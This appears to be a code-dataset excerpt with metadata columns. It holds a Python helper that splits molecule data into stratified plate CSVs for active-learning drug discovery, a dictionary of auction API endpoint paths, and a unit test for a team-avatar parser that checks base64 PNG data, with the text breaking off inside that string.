analysis_notebooks/stratify_helper.py
|
gitter-lab/active-learning-drug-discovery
|
b24004a359037b3a1175a61c181ec231b711c797
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import os
import glob
import pathlib
def stratify_target(data_df, output_dir, task_col_name,
split_size=96, cluster_col_name='BT_0.4 ID',
random_seed=20190918):
np.random.seed(random_seed)
data_df = data_df[~pd.isna(data_df[task_col_name])]
data_df = data_df.sort_values('Index ID')
data_df = data_df.reset_index(drop=True)
data_df = data_df.dropna()
active_indices = np.where(data_df[task_col_name] == 1)[0]
inactive_indices = np.where(data_df[task_col_name] == 0)[0]
u, c = np.unique(data_df[cluster_col_name], return_counts=True)
n_clusters = u.shape[0]
n_singletons = np.where(c == 1)[0].shape[0]
n_singletons_with_hits = data_df[data_df[cluster_col_name].isin(u[np.where(c == 1)[0]])][task_col_name].sum()
# target info
print('Target {}'.format(task_col_name))
print('Total molecules: {}, Total active: {}, Total inactive: {}, Total clusters: {}.'.format(data_df.shape[0],
active_indices.shape[0],
inactive_indices.shape[0],
np.unique(data_df[cluster_col_name]).shape[0]))
print('Clusters #: {}. Singletons #: {}. Singletons with hits #: {}'.format(n_clusters,
n_singletons,
n_singletons_with_hits))
# split into plates
num_splits = data_df.shape[0]//split_size + 1
actives_per_split = int(np.ceil(active_indices.shape[0]/num_splits))
inactives_per_split = split_size - actives_per_split
rnd_active_idx = np.random.permutation(active_indices)
rnd_inactive_idx = np.random.permutation(inactive_indices)
split_indices = np.random.permutation(num_splits)
active_i, inactive_i = 0, 0
total_mols, total_actives, total_inactives = 0, 0, 0
for split_count, split_i in enumerate(split_indices):
curr_indices = []
curr_split_size = split_size
if split_count == (num_splits-1):
curr_split_size = data_df.shape[0] - split_size*(num_splits-1)
# get random actives for this split
for i in range(actives_per_split):
if active_i < rnd_active_idx.shape[0]:
curr_indices.append(rnd_active_idx[active_i])
active_i += 1
curr_split_size-=1
# get random inactives for this split
for i in range(curr_split_size):
if inactive_i < rnd_inactive_idx.shape[0]:
curr_indices.append(rnd_inactive_idx[inactive_i])
inactive_i += 1
# shuffle the selected cpds
curr_indices = np.random.permutation(curr_indices)
curr_split_df = data_df.iloc[curr_indices,:]
# save the split to file
split_mols = curr_split_df.shape[0]
split_actives = curr_split_df[curr_split_df[task_col_name] == 1].shape[0]
split_inactives = curr_split_df[curr_split_df[task_col_name] == 0].shape[0]
total_mols += split_mols
total_actives += split_actives
total_inactives += split_inactives
curr_split_df.to_csv(output_dir+'/unlabeled_{}.csv'.format(split_i),
index=False)
print('Split {}: Total molecules: {}, Total active: {}, Total inactive: {}'.format(split_i, split_mols,
split_actives,
split_inactives))
print('Total molecules: {}, Total active: {}, Total inactive: {}.'.format(total_mols, total_actives, total_inactives))
# assert correctness
cdf = pd.concat([pd.read_csv(x) for x in glob.glob(output_dir+'/unlabeled_*.csv')])
cdf = cdf.sort_values('Index ID')
cdf = cdf.reset_index(drop=True)
assert cdf.equals(data_df)
def stratify_target_alt(data_df, output_dir, task_col_name,
num_samples=10, num_actives_in_split=1,
split_size=96, cluster_col_name='BT_0.4 ID',
random_seed=20190918):
np.random.seed(random_seed)
data_df = data_df[~pd.isna(data_df[task_col_name])]
data_df = data_df.sort_values('Index ID')
data_df = data_df.dropna()
data_df = data_df.reset_index(drop=True)
active_indices = np.where(data_df[task_col_name] == 1)[0]
inactive_indices = np.where(data_df[task_col_name] == 0)[0]
u, c = np.unique(data_df[cluster_col_name], return_counts=True)
n_clusters = u.shape[0]
n_singletons = np.where(c == 1)[0].shape[0]
n_singletons_with_hits = data_df[data_df[cluster_col_name].isin(u[np.where(c == 1)[0]])][task_col_name].sum()
# target info
print('Target {}'.format(task_col_name))
print('Total molecules: {}, Total active: {}, Total inactive: {}, Total clusters: {}.'.format(data_df.shape[0],
active_indices.shape[0],
inactive_indices.shape[0],
np.unique(data_df[cluster_col_name]).shape[0]))
print('Clusters #: {}. Singletons #: {}. Singletons with hits #: {}'.format(n_clusters,
n_singletons,
n_singletons_with_hits))
# split into plates
rnd_active_idx = np.random.permutation(active_indices)
rnd_inactive_idx = np.random.permutation(inactive_indices)
active_i, inactive_i = 0, 0
total_mols, total_actives, total_inactives = 0, 0, 0
for split_i in np.arange(num_samples):
curr_indices = []
curr_split_size = split_size
# get random actives for this split
for i in range(num_actives_in_split):
if active_i < rnd_active_idx.shape[0]:
curr_indices.append(rnd_active_idx[active_i])
active_i += 1
curr_split_size-=1
# get random inactives for this split
for i in range(curr_split_size):
if inactive_i < rnd_inactive_idx.shape[0]:
curr_indices.append(rnd_inactive_idx[inactive_i])
inactive_i += 1
# shuffle the selected cpds
curr_indices = np.random.permutation(curr_indices)
curr_split_df = data_df.iloc[curr_indices,:]
# save the split to file
split_mols = curr_split_df.shape[0]
split_actives = curr_split_df[curr_split_df[task_col_name] == 1].shape[0]
split_inactives = curr_split_df[curr_split_df[task_col_name] == 0].shape[0]
total_mols += split_mols
total_actives += split_actives
total_inactives += split_inactives
curr_split_df.to_csv(output_dir+'/unlabeled_{}.csv'.format(split_i),
index=False)
print('Split {}: Total molecules: {}, Total active: {}, Total inactive: {}'.format(split_i, split_mols,
split_actives,
split_inactives))
# shuffle the selected cpds
curr_indices = np.hstack([rnd_active_idx[active_i:], rnd_inactive_idx[inactive_i:]])
curr_indices = np.random.permutation(curr_indices)
curr_split_df = data_df.iloc[curr_indices,:]
# save the split to file
split_mols = curr_split_df.shape[0]
split_actives = curr_split_df[curr_split_df[task_col_name] == 1].shape[0]
split_inactives = curr_split_df[curr_split_df[task_col_name] == 0].shape[0]
total_mols += split_mols
total_actives += split_actives
total_inactives += split_inactives
curr_split_df.to_csv(output_dir+'/unlabeled_{}.csv'.format(num_samples),
index=False)
print('Split {}: Total molecules: {}, Total active: {}, Total inactive: {}'.format(num_samples, split_mols,
split_actives,
split_inactives))
print('Total molecules: {}, Total active: {}, Total inactive: {}.'.format(total_mols, total_actives, total_inactives))
# assert correctness
cdf = pd.concat([pd.read_csv(x) for x in glob.glob(output_dir+'/unlabeled_*.csv')])
cdf = cdf.sort_values('Index ID')
cdf = cdf.reset_index(drop=True)
assert cdf.equals(data_df)
| 48.27957
| 122
| 0.569488
| 1,099
| 8,980
| 4.318471
| 0.098271
| 0.051833
| 0.048673
| 0.03287
| 0.911504
| 0.897598
| 0.888748
| 0.856511
| 0.846397
| 0.846397
| 0
| 0.015963
| 0.33029
| 8,980
| 186
| 123
| 48.27957
| 0.773196
| 0.042762
| 0
| 0.847826
| 0
| 0
| 0.086713
| 0
| 0
| 0
| 0
| 0
| 0.014493
| 1
| 0.014493
| false
| 0
| 0.036232
| 0
| 0.050725
| 0.07971
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e8d24239bd6f33919168d994f39d305bad68c05b
| 275
|
py
|
Python
|
openprocurement/auctions/core/endpoints.py
|
EBRD-ProzorroSale/openprocurement.auctions.core
|
52bd59f193f25e4997612fca0f87291decf06966
|
[
"Apache-2.0"
] | 2
|
2016-09-15T20:17:43.000Z
|
2017-01-08T03:32:43.000Z
|
openprocurement/auctions/core/endpoints.py
|
EBRD-ProzorroSale/openprocurement.auctions.core
|
52bd59f193f25e4997612fca0f87291decf06966
|
[
"Apache-2.0"
] | 183
|
2017-12-21T11:04:37.000Z
|
2019-03-27T08:14:34.000Z
|
openprocurement/auctions/core/endpoints.py
|
EBRD-ProzorroSale/openprocurement.auctions.core
|
52bd59f193f25e4997612fca0f87291decf06966
|
[
"Apache-2.0"
] | 12
|
2016-09-05T12:07:48.000Z
|
2019-02-26T09:24:17.000Z
|
ENDPOINTS = {
'auction': '/auctions/{auction_id}',
'contract': '/auctions/{auction_id}/contracts/{contract_id}',
'contracts': '/auctions/{auction_id}/contracts',
'item': '/auctions/{auction_id}/items/{item_id}',
'items': '/auctions/{auction_id}/items',
}
| 34.375
| 65
| 0.647273
| 29
| 275
| 5.896552
| 0.275862
| 0.438596
| 0.497076
| 0.304094
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.123636
| 275
| 7
| 66
| 39.285714
| 0.709544
| 0
| 0
| 0
| 0
| 0
| 0.723636
| 0.603636
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
fa3570aa0d9160360bce2b658ecee26fc8b14bd7
| 19,188
|
py
|
Python
|
tests/test_fms_api_team_avatar_parser.py
|
tervay/the-blue-alliance
|
e14c15cb04b455f90a2fcfdf4c1cdbf8454e17f8
|
[
"MIT"
] | 1
|
2016-03-19T20:29:35.000Z
|
2016-03-19T20:29:35.000Z
|
tests/test_fms_api_team_avatar_parser.py
|
gregmarra/the-blue-alliance
|
5bedaf5c80b4623984760d3da3289640639112f9
|
[
"MIT"
] | 11
|
2020-10-10T03:05:29.000Z
|
2022-02-27T09:57:22.000Z
|
tests/test_fms_api_team_avatar_parser.py
|
gregmarra/the-blue-alliance
|
5bedaf5c80b4623984760d3da3289640639112f9
|
[
"MIT"
] | null | null | null |
import json
import unittest2
from datafeeds.parsers.fms_api.fms_api_team_avatar_parser import FMSAPITeamAvatarParser
from google.appengine.ext import ndb
from google.appengine.ext import testbed
from models.district import District
from consts.media_type import MediaType
class TestFMSAPITeamAvatarParser(unittest2.TestCase):
def setUp(self):
self.testbed = testbed.Testbed()
self.testbed.activate()
self.testbed.init_datastore_v3_stub()
self.testbed.init_memcache_stub()
ndb.get_context().clear_cache() # Prevent data from leaking between tests
def tearDown(self):
self.testbed.deactivate()
def test_parse_team_with_avatar(self):
with open('test_data/fms_api/2018_avatars_frc1741.json', 'r') as f:
models, _, more_pages = FMSAPITeamAvatarParser(2018).parse(json.loads(f.read()))
self.assertFalse(more_pages)
self.assertEqual(len(models), 1)
# Ensure we get the proper Media model back
media = models[0]
self.assertEqual(media.key, ndb.Key('Media', 'avatar_avatar_2018_frc1741'))
self.assertEqual(media.foreign_key, 'avatar_2018_frc1741')
self.assertEqual(media.media_type_enum, MediaType.AVATAR)
self.assertEqual(media.references, [ndb.Key('Team', 'frc1741')])
self.assertEqual(media.year, 2018)
self.assertEqual(media.details_json, '{"base64Image": "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"}')
def test_parse_team_with_no_avatar(self):
with open('test_data/fms_api/2018_avatars_frc1.json', 'r') as f:
models, _, more_pages = FMSAPITeamAvatarParser(2018).parse(json.loads(f.read()))
self.assertFalse(more_pages)
self.assertEqual(len(models), 0)
def test_parse_result_with_multiple_teams(self):
with open('test_data/fms_api/2018_avatars_multiple.json', 'r') as f:
models, _, more_pages = FMSAPITeamAvatarParser(2018).parse(json.loads(f.read()))
self.assertFalse(more_pages)
self.assertEqual(len(models), 1)
# Ensure we get the proper Media model back
media_team_1741 = models[0]
self.assertEqual(media_team_1741.key, ndb.Key('Media', 'avatar_avatar_2018_frc1741'))
self.assertEqual(media_team_1741.foreign_key, 'avatar_2018_frc1741')
self.assertEqual(media_team_1741.media_type_enum, MediaType.AVATAR)
self.assertEqual(media_team_1741.references, [ndb.Key('Team', 'frc1741')])
self.assertEqual(media_team_1741.year, 2018)
self.assertEqual(media_team_1741.details_json, '{"base64Image": "iVBORw0KGgoAAAANSUhEUgAAACgAAAAoCAYAAACM/rhtAAAABGdBTUEAALGOfPtRkwAAACBjSFJNAACHDwAAjA8AAP1SAACBQAAAfXkAAOmLAAA85QAAGcxzPIV3AAAKOWlDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAEjHnZZ3VFTXFofPvXd6oc0wAlKG3rvAANJ7k15FYZgZYCgDDjM0sSGiAhFFRJoiSFDEgNFQJFZEsRAUVLAHJAgoMRhFVCxvRtaLrqy89/Ly++Osb+2z97n77L3PWhcAkqcvl5cGSwGQyhPwgzyc6RGRUXTsAIABHmCAKQBMVka6X7B7CBDJy82FniFyAl8EAfB6WLwCcNPQM4BOB/+fpFnpfIHomAARm7M5GSwRF4g4JUuQLrbPipgalyxmGCVmvihBEcuJOWGRDT77LLKjmNmpPLaIxTmns1PZYu4V8bZMIUfEiK+ICzO5nCwR3xKxRoowlSviN+LYVA4zAwAUSWwXcFiJIjYRMYkfEuQi4uUA4EgJX3HcVyzgZAvEl3JJS8/hcxMSBXQdli7d1NqaQffkZKVwBALDACYrmcln013SUtOZvBwAFu/8WTLi2tJFRbY0tba0NDQzMv2qUP91829K3NtFehn4uWcQrf+L7a/80hoAYMyJarPziy2uCoDOLQDI3fti0zgAgKSobx3Xv7oPTTwviQJBuo2xcVZWlhGXwzISF/QP/U+Hv6GvvmckPu6P8tBdOfFMYYqALq4bKy0lTcinZ6QzWRy64Z+H+B8H/nUeBkGceA6fwxNFhImmjMtLELWbx+YKuGk8Opf3n5r4D8P+pMW5FonS+BFQY4yA1HUqQH7tBygKESDR+8Vd/6NvvvgwIH554SqTi3P/7zf9Z8Gl4iWDm/A5ziUohM4S8jMX98TPEqABAUgCKpAHykAd6ABDYAasgC1wBG7AG/iDEBAJVgMWSASpgA+yQB7YBApBMdgJ9oBqUAcaQTNoBcdBJzgFzoNL4Bq4AW6D+2AUTIBnYBa8BgsQBGEhMkSB5CEVSBPSh8wgBmQPuUG+UBAUCcVCCRAPEkJ50GaoGCqDqqF6qBn6HjoJnYeuQIPQXWgMmoZ+h97BCEyCqbASrAUbwwzYCfaBQ+BVcAK8Bs6FC+AdcCXcAB+FO+Dz8DX4NjwKP4PnEIAQERqiihgiDMQF8UeikHiEj6xHipAKpAFpRbqRPuQmMorMIG9RGBQFRUcZomxRnqhQFAu1BrUeVYKqRh1GdaB6UTdRY6hZ1Ec0Ga2I1kfboL3QEegEdBa6EF2BbkK3oy+ib6Mn0K8xGAwNo42xwnhiIjFJmLWYEsw+TBvmHGYQM46Zw2Kx8lh9rB3WH8